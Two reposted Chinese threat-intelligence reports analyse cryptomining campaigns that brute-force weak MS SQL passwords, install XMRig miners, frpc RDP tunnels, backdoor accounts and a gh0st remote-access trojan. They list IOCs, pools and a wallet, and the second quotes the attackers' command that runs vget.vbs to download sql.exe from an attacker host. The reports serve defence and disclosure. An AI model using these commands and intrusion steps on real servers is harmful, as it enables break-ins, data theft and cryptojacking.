感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/znFP8IjcC3KIuPfsm_93oA     一、概述 腾讯安全威胁情报中心检测到针对MS SQL服务器攻击的挖矿木马，该挖矿木马主要针对MS SQL服务进行爆破弱口令攻击，爆破成功后会植入门罗币挖矿木马进行挖矿。同时攻击者下载frpc内网穿透工具安装后门，并会添加用户以方便入侵者远程登录该服务器。 从挖矿木马的HFS服务器计数看，已有上万台MS SQL服务器被植入挖矿木马，另有数十台服务器被安装后门。攻击者在失陷服务器上安装内网穿透工具会进一步增加黑客入侵风险，企业数据库服务器沦陷会导致严重信息泄露事件发生。 腾讯安全专家建议企业在所有服务器上避免使用弱口令，爆破攻击通常是黑客试水的第一步，使用弱口令非常容易导致企业资产被入侵。腾讯T-Sec终端安全管理系统（御点）已可拦截查杀该挖矿木马。 腾讯安全旗下安全产品已针对该挖矿木马的入侵行为进行检测和拦截，具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）该木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1） 腾讯云镜支持Mssql弱密码检测； 2）腾讯云镜支持查杀该挖矿木马。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 （Cloud Workload Protection，CWP） 1）腾讯漏洞扫描服务已支持监测全网资产是否受MSSQL弱密码影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息，可参考：https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯漏洞扫描服务等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）对利用mssql爆破入侵的相关协议特征进行识别检测； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）查杀该团伙入侵释放的挖矿程序，内网端口映射工具； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 二、样本分析 该黑产团伙对mssql服务器进行爆破成功后，会下载执行HFS服务器上的恶意文件，从下载量来看，受感染的服务器有数万台，被植入后门的服务器有数十台，挖矿木马HFS文件列表如下： Adduser.exe，添加后门账户，用于后续远程登陆。 SQL.exe执行后释放4个文件到c:\windows\Fonts目录中 c:\windows\Fonts\Csrss.exe是NSSM服务封装程序，用于将sqlwriters.exe注册为服务，服务名为SQLServer Sqlwrites.exe是基于xmrig 6.2的挖矿程序 矿池： xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 Frp_C.exe执行后释放以下文件到c:\windows\Fonts中 Dllhost.exe是一款开源的内网穿透工具Frpc，Bat负责生成frpc配置文件，以及设置服务启动项，目的是将本机的3389端口暴露给黑客服务器frp.hex7e4.ru，黑客可直接通过RDP连接到受害服务器，进而控制企业内网。 IOCs Doamin xxx.hex7e4.ru xmr.hex7e4.ru d3d.hex7e4.ru IP 43.229.149.62 185.212.128.180 URLs hxxp://43.229.149.62:8080/web/Add.exe hxxp://43.229.149.62:8080/web/AddUser.exe hxxp://43.229.149.62:8080/web/dw.exe hxxp://43.229.149.62:8080/web/Frp_C.exe hxxp://43.229.149.62:8080/web/frpc.exe hxxp://43.229.149.62:8080/web/frpc.ini hxxp://43.229.149.62:8080/web/po.jpg hxxp://43.229.149.62:8080/web/se.jpg hxxp://43.229.149.62:8080/web/SQL.exe hxxp://43.229.149.62:8080/web/sqlwriters.jpg hxxp://43.229.149.62:8080/web/sqlwriters1.jpg hxxp://43.229.149.62:8080/web/xx.txt hxxp://43.229.149.62:8080/web/xxx.txt MD5 9a745dc59585a5ad76fee0867acd1427 statr.bat 301257a23e2cad9da915cd942c833146 sqlwriters.exe 9a22fe62ebad16edc5c489c9493a5882 Frp_C.exe 88527fecde10ca426680d5baf6b384d1 po.jpg e27ba54c177c891ad3077de230813373 xxx.txt 2176ecfe4d91964ffec346dd1527420d xx.txt f457a5f0472e309c574795ca339ab566 sql.exe

感谢腾讯御见威胁情报中心来稿！ 原文：https://s.tencent.com/research/report/888.html   一、背景 腾讯安全威胁情报中心检测到“快Go矿工”更新，该团伙本次更新利用MSSQL弱口令爆破攻击的方式进行传播。“快Go矿工”由御见威胁情报中心于2019年10月发现，最初仅利用“永恒之蓝”漏洞进行攻击传播，因其使用的C2域名中包含“kuai-go”，腾讯安全威胁情报中心将其命名为“快Go矿工”（KuaiGoMiner）。 “快Go矿工”最新变种将挖矿程序伪装成系统进程WinInit.exe，截止目前已挖矿获得门罗币47个，市值人民币2万余元。同时，病毒在攻陷机器上植入的gh0st远控木马，具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能，被攻陷的电脑还会面临机密信息泄露的风险。 据腾讯威胁情报中心统计数据，“快Go矿工”（KuaiGoMiner）变种已攻击上万台电脑，受害最严重地区为江苏、山东和广东。 腾讯安全提醒企业用户检查SQL服务器的SA用户口令，切勿配置弱口令登录，快Go矿工入侵后还会使用永恒之蓝系列攻击工具横向传播，植入远控木马，对政企机构信息系统安全构成严重威胁。 二、漏洞攻击 “快Go矿工” (KuaiGoMiner) 变种在攻陷的系统下载攻击模块，释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具，释放到C:\Windows\Fonts\usa\目录下。 释放成功后go.vbs首先启动，然后执行go.bat，在go.bat中利用服务管理工具NSSM（释放文件名为svchost.exe）将攻击脚本cmd.bat安装为服务HTTPServers反复执行。 cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和 http[:]//sex.zhzy999.net/ip2.php获取本机的IP地址， 请求http[:]//scan.jiancai008.com:88/2020/random.asp获取随机生成的C段和D段为“0.0“的IP地址，然后利用 “永恒之蓝”漏洞攻击工具针对本机同网段IP和随机生成的IP进行扫描攻击。 三、MSSQL爆破 近期KuaiGoMiner还利用MSSQL弱口令爆破进行攻击，爆破成功后首先通过shell代码写入vget.vbs作为下载者程序，然后利用vget.vbs下载PE木马sql.exe，下载命令如下： C:/Program Files (x86)/Microsoft SQL Server/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exe C:/ProgramData/vget.vbs  http[:]//sex.zhzy999.net/sql.exe C:/ProgramData/taskger.exe sql.exe为gh0st远控木马，该木马控制电脑后，继续下载挖矿木马http[:]//go.jiancai008.com:88/2020/1.rar，然后解压释放文件到目录C:\Windows\Fonts\usa\。 将门罗币挖矿程序WinInit.exe安装为服务”WinIniter”，使用矿池：xmr-eu1.nanopool.org:14433，钱包：4Ao7AGamzR4cs4E4uK5tcFF9TR6ouXMY4LAi64jHGYQZRWYCupQ7coBGzE7BtcHBWvQFreNEMg1s9iws7ejgwZtB1gQ55Uq进行挖矿。 目前该钱包已挖矿获取门罗币47.169个，折合人民币28000余元。 四、安全建议 1.服务器使用安全的密码策略，特别是IPC$、MSSQL、RDP服务的账号密码，切勿使用弱口令； 2.根据微软公告及时修复以下Windows系统高危漏洞； MS17-010永恒之蓝漏洞 XP、WindowsServer2003、win8等系统访问： http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 建议企业用户使用腾讯T-Sec终端安全管理系统（腾讯御点，下载链接：https://s.tencent.com/product/yd/index.html），个人用户使用腾讯电脑管家进行漏洞扫描和修复。 3.企业用户可部署腾讯T-Sec高级威胁检测系统(御界)，发现、追踪黑客攻击线索。腾讯T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html） IOCs IP 64.111.27.3 Domain sex.zhzy999.net scan.jiancai008.com s.jiancai008.com go.jiancai008.com URL http[:]//sex.zhzy999.net/sql.exe http[:]//go.jiancai008.com:88/2020/1.rar http[:]//go.jiancai008.com:88/2020/2.rar http[:]//go.jiancai008.com:88/2020/3.rar MD5 1a5ba25af9d21f36cf8b3df7d2f55348 b87af17c857b208fcd801cb724046781 09bf2fef86d96ec9a1c3be0a020ae498 57bd72d6dc95ff57b5321a62b9f7cde2 70d3908f1b9909b7d23ee265e77dd1f9 1f1bc2ec00db3551d7700c05c87956df 05c57ccd23ab3f623bf1adda755af226